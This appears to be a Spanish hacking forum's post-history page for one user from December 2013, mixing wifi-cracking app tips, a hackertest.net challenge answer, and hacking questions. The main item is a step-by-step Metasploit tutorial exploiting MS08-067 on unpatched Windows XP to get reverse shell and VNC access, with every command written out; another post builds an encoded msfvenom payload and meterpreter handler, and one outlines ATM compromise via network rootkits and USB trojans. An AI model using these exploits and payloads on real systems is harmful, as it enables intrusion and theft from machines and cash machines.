Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - nightcode

#191
Cita de: fakundo en 30 Diciembre 2013, 15:51 PM
-Liberad a wifi
-WifiPassword
-WLANAudit
yo recomiendo Liberad a wifi
estan en la play store
(solo funcionan con Android o ios)

Muy buen aporte: Gracias Fakundo Sigue asi!
#192
Cita de: Sh4k4 en 30 Diciembre 2013, 15:36 PM
Ninguno por el momento y si existiese like "reaveriando" a la inversa, entonces solo afectaria a ciertas marcas o modelos en especifico.

Muy Muy Cierto
#193
Hacking Wireless / Re: Consulta
30 Diciembre 2013, 19:37 PM
Cita de: @shellroot en 30 Diciembre 2013, 19:30 PM
ajjaja asi de fácil  ;-)

;-) ::) jeje si y muchooo muchooo dinero xD :D
#194
Hacking Wireless / Re: Consulta
30 Diciembre 2013, 19:31 PM
Cita de: Mr_Magritte en 30 Diciembre 2013, 19:09 PM
Buenas.! en unas de mis idas al cajero automatico me tope con uno que habia sido reiniciado, eso creo yo, debido a un corte de luz, y en su pantalla aparecia el IP, SubnetMask, y default gateway.
Me gustaria saber si esos datos pueden ser de utilidad o no.
Tambien estoy interesado en saber que cosas se pueden lograr sabiendo eso.
:rolleyes: Espero respuestas...

Post Data: me pareció muy interesante tu pregunta. olvide decirte que los cajeros mas sofisticados algunos cuentan con anti virus aunque no lo crean xD
#195
Hacking Wireless / Re: Consulta
30 Diciembre 2013, 19:28 PM
Que alguien con conocimientos en cuanto a cajeros automáticos se refiere me corrija :S pero personalmente pienso y haciendo una leve investigación forense con respecto a lo datos que me das es que el cajero fue infectado por algun malware y efectivamente se le realizo un reinicio tal vez bueno mejor prefiero no dar el name del troyano que es para capturar datos bancarios para ello tuvo que entrar a través de los sistemas de windows o la plataforma con la que trabaje. en cuanto a tu pregunta ese cajero y la mayoría trabajan con protocolos ip en time real

si pueden ser de utilidad los datos que diste tanto utilidad positiva como negativa ya con la ip es mucho   

los ataque se puede llevar a cabo sin tocar al cajero, es decir,
por Internet o por dial-up.
para realizar el ataque, se necesita saber la dirección IP del cajero o su "número
telefónico" (se puede hacer un wardialing -barrido- y descubrir a los cajeros dependiendo la marca, por ejemplo). Una vez que se tiene al cajero en la mira, se le instala un
rootkit vía red, un tal Barnaby si mal no recuerdo codifico uno y lo bautizó como Dillinger. A partir de ese
momento, se puede ordenar al cajero sacar todo el dinero o simplemente grabar
la información de las tarjetas que a partir de ahora se inserten en él. El cajero ha
cambiado de dueño xD. Para el caso del cajero marca de distinta marca hablemos de Triton, se debe de interactuar
con el cajero. Éste se abre con el fin de conectar una memoria USB, la cual infecta
al cajero con un troyano. La llave para abrir esos cajeros cuesta 10 dólares en EUA
y es una llave maestra para todos los cajeros de esa marca. ¿Así o más fácil? xD perdón me desvié un poco del tema. xD en si la información que tienes es buena! oOJO solo la información que di es meramente informativa no incito a nada y me desentiendo de lo que cualquier OTRO usuario mal intencionado pudiese hacer xD
#196
Cita de: Vaagish en 30 Diciembre 2013, 18:49 PM
@shellroot, cuando comentas vos pierdo la concentración en el foro viendo esa morocha moviendo el pandeiro!!  ;D

Bueno, no soy para nada experto en la seguridad web, como se puede resolver el Nivel 7?
Yo solo uso la consola de Chrome,, o se precisa de herramienta externa? Por lo que veo no usa SQL.. Puede ser eso?  :silbar:


Nivel 7

saludos Vaagish Bien te voy a ayudar a pasar este nivel xD , aquí nos encontramos con un formulario que nos pide nombre de usuario y contraseña cierto?, si examinamos un poco el código de fuente, el formulario lo envía a "pwd2.php" y ahí lo trabaja. De modo que no podemos ver la contraseña en el código, ya que no podemos leer el documento PHP porque va de lado del servidor.

¿Y qué hacemos?
Examinar todo lo que tenemos en el código :O.
Con un poco de imaginación xD, vamos a comprobar si esta imagen esconde algo >.>:

Código: [Seleccionar]
<body bg="images/included.gif">

Nos vamos a http://www.hackertest.net/images/included.gif

aparentemente no ahi nada T_T, está en blanco :O, pero si te fijas bien en la esquina inferior derecha O.o O.O ... ¡ahí está!:O O.o :D

Solución 7:
Usuario: phat
Contraseña: jerkybar3
#197
Jaja buenisimo me pasaron. Hay uno bien fino pero hay que bajarlos pesan como 20mb uno es hackthe game y el otro es hacker evolution pruebalos
#198
en este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando Metasploit en BackTrack 5 y el famoso exploit Netapi.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.

Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --> http://www.backtrack-linux.org/downloads/
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de como iniciar Backtrack 5 desde un CD.

Comenzamos...

1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:

Código: [Seleccionar]
ifconfig



Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.

2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente

Código: [Seleccionar]
nmap -sS -O [Rango de IP]

Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255

http://i49.servimg.com/u/f49/17/29/41/45/dibujo10.jpg

Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4. Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.

3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:

Código: [Seleccionar]
msfconsole




4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:

Código: [Seleccionar]
use exploit/windows/smb/ms08_067_netapi

5- Seteamos como objetivo a la IP de la PC con windows XP:

Código: [Seleccionar]
set RHOST [IP Objetivo]

Ejemplo: set RHOST 10.0.0.4

6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y "windows/vncinject/reverse_tcp"

"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.

Cargamos escribiendo lo siguiente:

set PAYLOAD windows/shell/reverse_tcp

7- Seteamos con nuestra IP local:

Código: [Seleccionar]
set LHOST [IP Local]

Ejemplo: set LHOST 10.0.0.3


8- Enviamos el exploit:
Código: [Seleccionar]
exploit



Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.

Ahora como otra alternativa usaremos el Payload de VNC "windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.

Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.

9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.

10- Cargamos el Payload escribiendo:

Código: [Seleccionar]
set PAYLOAD windows/vncinject/reverse_tcp

11- Seteamos con nuestra IP local:

Código: [Seleccionar]
set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3

12- Enviamos el exploit escribiendo:

Código: [Seleccionar]
exploit




Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!

Resumen de los comandos utilizados:

Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4


Código: [Seleccionar]
msfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit


Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.

Se recomienda actualizar windows XP para evitar este tipo de ataques.

espero les ayude meramente infomativo. para ser probado virtualmente.
disculpen por las imágenes aun no me familiarizo en colocar fotos xD
#199
Hacking / ayuda con metasploit
30 Diciembre 2013, 15:50 PM
Ola amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:






Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!
#200
Cita de: todo_y_nada en 30 Diciembre 2013, 14:58 PM
bueno, he querido hacer esta pregunta ante la duda, se que el modo de operación de cada liberación o desbloqueo es diferente, pero me gustaría saber si la finalidad es la misma, es decir si con un jailbreak también es posible liberar un teléfono para que este sea usado por cualquier compañía telefónica?, si es así, mi segunda pregunta es que si se desbloquea por IMEI, es posible instalar Cydia en un IPhone?.
de ante mano se agradecen la cooperación.

que marca es el teléfono? huawei? nokia? podes liberarlo por imei o manual por código abriendo las bandas pero. si me decis el modelo te puedo explicar mejor